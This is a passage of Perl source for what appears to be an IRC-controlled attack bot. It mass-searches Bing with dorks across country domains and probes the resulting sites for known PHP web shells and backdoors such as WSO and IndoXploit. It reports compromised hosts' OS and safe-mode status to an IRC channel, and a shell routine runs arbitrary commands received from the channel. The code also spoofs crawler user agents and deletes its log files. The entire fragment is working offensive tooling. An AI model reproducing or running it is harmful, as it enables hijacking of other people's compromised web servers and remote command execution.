("http://www.bing.com/search?q=".uri_escape($key)."&cc=ve&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingVE/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingVN() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=vn&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingVN/) { my @grep = links($link); push(@list,@grep); } } } return @list; } sub bingMUSEUM() { my @list; my $key = $_[0]; for (my $i=1; $i<=500; $i+=10) { my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=museum&rf=1&first=".$i."&FORM=PORE"); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) { my $link = $1; if ($link !~ /msn|live|bingMUSEUM/) { my @grep = links($link); push(@list,@grep); } } } return @list; } ######################################### sub backdoorCheck { my ($site,@path) = @_; my @result = ("false"); my $url; my $safe; my $os; my $siteUrl; my $key = 0; foreach my $path(@path) { if($path =~ /\+/) { my @part = split(/\+/,$path); $url = "http://".$site.$part[0]."?".$part[1]; $siteUrl = "http://".$site.$part[0]; } else { $url = "http://".$site.$path; $siteUrl = "http://".$site.$path; } my $check = &get_content($url); sleep(3); if($check =~ /<form action="" method="post" enctype="multipart\/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload">/ig) { $os= $1 if ($check =~ /<b>[<br>]*(.+?)<br><\/b><form/); if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$i); $last = 1; } } if($check =~ /<td>Current Path : <a href="\?path=\/">/i && $check =~ /<form enctype="multipart\/form-data" method="POST">Upload File : <input type="file".*\/>/i) { $os= $1 if ($check =~ /<b>[<br>]*(.+?)<br><\/b><form/); if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$i); $last = 1; } } if($check =~ /<input type="file" name="upload".*\/>/i && $check =~ /<input type="submit" name="submit\_upload".*\/>/i) { $os= $1 if ($check =~ /<b>[<br>]*(.+?)<br><\/b><form/); if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$i); $last = 1; } } if($check =~ m/SAFE_MODE/ig or $check =~ m/Uname/ig or $check =~ /GIF89a/ig){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ m/Pagat - Shell/ig or $check =~ m/Uname/ig or $check =~ /Pagat - Shell/ig){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ m/BArNEr/ig or $check =~ m/Uname/ig or $check =~ /GIF89a/){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ m/BArNEr/ig or $check =~ m/Uname/ig or $check =~ /BArNEr/i){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ m/roin - exploit/ig or $check =~ m/Uname/ig or $check =~ /GIF89a/){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ m/File Upload here/ig or $check =~ m/Uname/ig or $check =~ /File Upload here/){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ m/Pagat IndoeXploit/ or $check =~ m/Uname/ig or $check =~ /Pagat IndoeXploit/i){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ /GIF89a/ or $check =~ m/Uname/ig or $check =~ m/MildNet - Shell/ig){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ m/Jember Shell/ig or $check =~ m/Uname/ig or $check =~ /Jember Shell/i){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ m/GIF89a/ or $check =~ m/Uname/ig or $check =~ /Touched By zE/i){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ m/ramzkie is here/ or $check =~ m/Uname/ig or $check =~ /ramzkie is here/i){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ m/post\>Password:/ or $check =~ m/Uname/ig or $check =~ /post\>Password:/){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ m/Touched By Silk/ or $check =~ m/Uname/ig or $check =~ /Touched By Silk/i){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } if($check =~ m/post\>Password:/ or $check =~ m/Uname/ig or $check =~ /JavaShell/i){ $safe = '';$os = ''; if ($check =~ m/SAFE_MODE : (.*?)<\/b>/) { $safe = $1;} if ($check =~ m/Uname : (.*?)<\/b>/){ $os=$1;} if(lc($safe) eq "on") { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } elsif($check =~ m/Software/ig or $check =~ m/Freespace/ig) { $safe = '';$os = ''; if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;} if($safe eq "") { if ($check =~ m/SAFE MODE is (.*?)\(/) {$safe = $1;} } if ($check =~ m/OS : (.*?)<br>/) {$os = $1;} if ($safe =~ /ON/i) { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } elsif ($check =~ m/jalanG/ig) { $safe = '';$os = ''; if ($check =~ m/Safe-mode:(.*?)\]/i) {$safe = $1;} if ($check =~ m/OS:(.*?)\]/i) {$os = $1;} if ($safe =~ /ON/i) { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } elsif ($check =~ m/Uname/ig or $check =~ m/Hdd/ig) { $safe = '';$os = ''; if ($check =~ m/Safe mode:<\/span><font(.*?)><b>(.*?)<\/b>/i) {$safe = $2;} if ($check =~ m/Cwd:<\/span><\/td><td><nobr>(.*?)?<\/nobr>/i) {$os = $1;} if ($safe =~ m/ON/i) { $safe = "14ON";} else { $safe = "3OFF";}; if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } elsif ($check =~ m/post\>Password:/ig or $check =~ m/name\=\"pass\"/ig) { @result = (); @result = ($siteUrl, $os, $safe,$key); last; } elsif ($check =~ m/Shell/ig or $check =~ m/Pengguna/ig) { $safe = "3OFF";$os = ''; if ($check =~ /Sistem : (.*?)<\/b>/){$os=$1;} if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } else { if($check =~ m/\[uname\]/ig) { $safe = '';$os = ''; if ($check =~ m/\[uname\](.*?)\[\/uname\]/i){$os=$1;} if ($check =~ m/Safe Mode = (.*?)>/i) {$safe = $1;} if($os ne ""){ @result = (); @result = ($siteUrl, $os, $safe,$key); last; } } } $key++; } return @result; } sub backdoorCheck2 { my ($chan,$site,@path) = @_; my @result; my $siteUrl; my $key = 0; foreach my $path(@path) { my $scn = 1; @result = ("false"); my $os = ""; my $url = "http://".$site.$path; my $check = &get_content($url); sleep(5); if($check =~ /GIF89a;/ig || $check =~ /SAFE\_MODE/ig || $check =~ /Uname\s*\:\s*/ig) { if ($check =~ /Uname\s*:\s*(.*?)\</){ $os=$1;} if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$key); $scn = 0; } } if($check =~ /Pagat - Shell/ig || $check =~ /SAFE\_MODE/ig || $check =~ m/Pagat - Shell/ig) { if ($check =~ /Uname\s*:\s*(.*?)\</){ $os=$1;} if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$key); $scn = 0; } } if($check =~ m/roin - exploit/ig || $check =~ /SAFE\_MODE/ig || $check =~ /Uname\s*\:\s*/ig) { if ($check =~ /Uname\s*:\s*(.*?)\</){ $os=$1;} if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$key); $scn = 0; } } if($check =~ m/Pagat IndoeXploit/ig || $check =~ /SAFE\_MODE/ig || $check =~ /Uname\s*\:\s*/ig) { if ($check =~ /Uname\s*:\s*(.*?)\</){ $os=$1;} if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$key); $scn = 0; } } if($check =~ m/Jember Shell/ig || $check =~ /SAFE\_MODE/ig || $check =~ /Uname\s*\:\s*/ig) { if ($check =~ /Uname\s*:\s*(.*?)\</){ $os=$1;} if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$key); $scn = 0; } } if($check =~ m/File Upload here/ig || $check =~ /SAFE\_MODE/ig || $check =~ /Uname\s*\:\s*/ig) { if ($check =~ /Uname\s*:\s*(.*?)\</){ $os=$1;} if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$key); $scn = 0; } } if($check =~ m/Software/ig or $check =~ m/Freespace/ig) { if ($check =~ m/OS : (.*?)<br>/) {$os = $1;} if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$key); $scn = 0 } } if ($check =~ m/Uname/ig or $check =~ m/Hdd/ig) { if ($check =~ m/Cwd:<\/span><\/td><td><nobr>(.*?)?<\/nobr>/i) {$os = $1;} if($os ne "" && $os ne '".php_uname()."'){ $os =~ s/\<a href.*\>//ig; @result = ($url,$os,$key); $scn = 0; } } if ($check =~ m/Safe-mode/ig) { if ($check =~ m/OS:(.*?)\]/i) {$os = $1;} if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$key); $scn = 0; } } if($check =~ /\<form method=["|']?post["|']?>Password:\s*<input type=["|']?password["|']? name=["|']?(pass|pwd|password)["|']?><input type=["|']?submit["|']? value/ig) { @result = ($url, "backdoor",$key); $scn = 0; } if($check =~ /WSO/ig) { @result = ($url, "backdoor",$key); $scn = 0; } #kodox.php if($check =~ /<form action="" method="post" enctype="multipart\/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload">/ig) { if ($check =~ /<b>[<br>]*(.+?)<br><\/b><form/){ $os=$1;} if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$key); $scn = 0; } } if($check =~ /<td>Current Path : <a href="\?path=\/">/i && $check =~ /<form enctype="multipart\/form-data" method="POST">Upload File : <input type="file".*\/>/i) { @result = ($url,"backdoor",$i); $scn = 0; } if($check =~ /<input type="file" name="upload".*\/>/i && $check =~ /<input type="submit" name="submit\_upload".*\/>/i) { @result = ($url,"backdoor",$i); $scn = 0; } if($check =~ m/2018 Simple Injektor/ig) { $os = $1 if ($check =~ m/OS:(.*?)\]/i); if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$i); $scn = 0; } } if ($check =~ m/Shell/ig or $check =~ m/Pengguna/ig) { if ($check =~ /Sistem : (.*?)<\/b>/){$os=$1;} if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$key); $scn = 0; } } if($check =~ m/\[uname\]/ig) { if ($check =~ m/\[uname\](.*?)\[\/uname\]/i){$os=$1;} if($os ne "" && $os ne '".php_uname()."'){ @result = ($url,$os,$key); $scn = 0; } } ($scn) ? $key++ : last; sleep(int(rand(5))); } return @result; } sub clean() { my @cln = (); my %visit = (); foreach my $element (@_) { $element =~ s/\/+/\//g; next if $visit{$element}++; push @cln, $element; } return @cln; } sub key() { my $dork = $_[0]; $dork =~ s/ /\+/g; $dork =~ s/:/\%3A/g; $dork =~ s/\//\%2F/g; $dork =~ s/\?/\%3F/g; $dork =~ s/&/\%26/g; $dork =~ s/\"/\%22/g; $dork =~ s/,/\%2C/g; $dork =~ s/\\/\%5C/g; $dork =~ s/@/\%40/g; $dork =~ s/\[/\%5B/g; $dork =~ s/\]/\%5D/g; $dork =~ s/\?/\%3F/g; $dork =~ s/\=/\%3D/g; $dork =~ s/\|/\%7C/g; return $dork; } sub links() { my @list; my $link = $_[0]; my $host = $_[0]; my $hdir = $_[0]; $hdir =~ s/(.*)\/[^\/]*$/\1/; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $host .= "/"; $link .= "/"; $hdir .= "/"; $host =~ s/\/\//\//g; $hdir =~ s/\/\//\//g; $link =~ s/\/\//\//g; push(@list,$link,$host,$hdir); return @list; } sub search_engine_query() { my $url = $_[0]; $url =~ s/http:\/\///; my $host = $url; my $query = $url; my $page = ""; $host =~ s/href=\"?http:\/\///; $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; $query =~ s/$host//; if ($query eq "") { $query = "/"; } eval { my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return; print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n"; my @pages = <$sock>; $page = "@pages"; close($sock); }; return $page; } ######################################### sub getUagent { my $uagent = $uagents[rand(scalar(@uagents))]; return $uagent; } sub Query(){ my($link, $timeout, $cookie)=@_; if($timeout == ""){ my $timeout = 10; } my $req=HTTP::Request->new(GET=>$link); my $ua=LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); if($cookie == 1){ $ua->cookie_jar(HTTP::Cookies->new(file => $cookietmp, autosave => 1,)); } $ua->agent($User_Agent[rand(scalar(@User_Agent))]); $ua->timeout($timeout); my $response=$ua->request($req); return $response->content; } ##[ USERAGENT ]## sub Mobile(){ my @ret = ( "Opera/9.80 (J2ME/MIDP; Opera Mini/4.3.24214/24.838; U; en) Presto/2.5.25 Version/10.54", "Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54", "Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.29476/27.1573; U; id) Presto/2.8.119 Version/11.10", "Opera/9.80 (J2ME/MIDP; Opera Mini/6.5.26955/27.1407; U; en) Presto/2.8.119 Version/11.10", "Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.18741Mod.by.Handler/22.414; U; en) Presto/2.5.25 Version/10.54", "Opera/9.80 (Series 60; Opera Mini/6.1.25759/25.872; U; en) Presto/2.5.25 Version/10.54", "Opera/9.80 (J2ME/MIDP; Opera Mini/5.1.21415/22.387; U; en) Presto/2.5.25 Version/10.54" ); return(@ret); } ##[ USERAGENT ]## sub Agent(){ my @ret = ( "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "FreeWebMonitoring SiteChecker/0.1 (+http://www.freewebmonitoring.com)", "Gigabot/3.0 (http://www.gigablast.com/spider.html)", "Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)", "Mozilla/5.0 (compatible;bingbot/2.0;+http://www.bing.com/bingbot.htm)", "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" ); return(@ret); } ##[ DORK WRITE OR CHECK ]## sub ReadLogs(){ my $file = $_[0]; my $dork = uri_escape($_[1]); my $success = 0; open(BACA, "<$file"); while(my $baca=<BACA>){ chop($baca); if($baca =~ /^$dork/i){ $success = 1; } } close BACA; return $success; } sub WriteLogs(){ my $file = $_[0]; my $dork = uri_escape($_[1]); open(TULIS, ">>$file"); print TULIS $dork."\n"; close TULIS; } ##[ HAPUS ]## sub Remove(){ my @file = ( "Google.txt", "Yahoo.txt", "Baidu.txt", "SNZ.txt", "Ecosia.txt", "Bypass.txt", "Bingdom.txt", "Bing.txt", "Dogpile.txt", "WOW.txt", "Teoma.txt", "MWS.txt", "Googledom.txt", "Search.txt", "Sougou.txt", "Yahoos.txt", "Seznam.txt", "Kvasir.txt", "Najdi.txt", "Interia.txt", "Lycos.txt", "Lookseek.txt", "ASK.txt", "Lexis.txt", "XXX.txt", ); foreach my $n (@file){ system("rm -rf".$n); system("REMOVE".$n); } } sub sendMsg { my($tipe, $magelogo,$engine,$chan, $nick,$msg,$os,$safe) = @_; if($tipe == 1) { &msg("$channel",$art{"front"}."$logo 8Send to 9ID:$id".$art{"back"}); } elsif($tipe == 2) { &msg("$channel", $art{"front"}."9ID:$id".$art{"div"}."3".uc($engine).$art{"div"}."9Executing payload...".$art{"back"}); &msg("$channel",$art{"front"}."9ID:$id".$art{"div"}."3".uc($engine).$art{"div"}."$logo".$art{"div"}.$art{"circ1"}."OS:9$os".$art{"circ2"}." ".$art{"circ1"}."SAFEMODE:$safe".$art{"circ2"}.$art{"back"}); }elsif($tipe == 3) { &msg("$channel", "![7$engine]! [ 3Login 8 Success ] [ 9Payment 8 ".$os." ]"); } } sub GetLink(){ my @file = ( "Google.txt", "Yahoo.txt", "Baidu.txt", "SNZ.txt", "Ecosia.txt", "Bypass.txt", "Bingdom.txt", "Bing.txt", "Dogpile.txt", "WOW.txt", "Teoma.txt", "MWS.txt", "Googledom.txt", "Search.txt", "Sougou.txt", "Yahoos.txt", "Seznam.txt", "Kvasir.txt", "Najdi.txt", "Interia.txt", "Lycos.txt", "Lookseek.txt", "ASK.txt", "Lexis.txt", "XXX.txt", ); my $link; my @total; foreach my $n (@file){ open(F,'<', $n); while($link = <F>){ $link=~s/[\r\n]//g; push(@total, $link); } close(F); } return(@total); } ##[ UNIQUE ]## sub Unique(){ my @Unique = (); my %seen = (); foreach my $element (@_){ next if $seen{$element}++; push @Unique, $element; } return @Unique; } sub shell() { my $path = $_[0]; my $cmd = $_[1]; if ($cmd =~ /cd (.*)/) { chdir("$1") || &msg("$path","No such file or directory"); return; } elsif ($pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my @output = `$cmd 2>&1 3>&1`; my $c = 0; foreach my $output (@output) { $c++; chop $output; &msg("$path","$output"); if ($c == 5) { $c = 0; sleep 3; } } exit; }} } sub isAdmin() { my $status = 0; my $nick = $_[0]; if ($nick eq $admin) { $status = 1; } return $status; } sub msg() { return unless $#_ == 1; sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]"); } sub nick() { return unless $#_ == 0; sendraw("NICK $_[0]"); } sub notice() { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); } sub read_dorks() { my $dork = uri_escape($_[0]); my $file = "dorks.txt"; my $success = 0; open (file,"<$file"); while (my $dorkx=<file>) { chop($dorkx); if ($dorkx =~ /$dork/){ $success = 1; } } close file; return $success; } sub write_dorks() { my $dorks = uri_escape($_[0]); my $file = "dorks.txt"; open (filex,">>$file"); print filex $dorks."\n"; close filex; }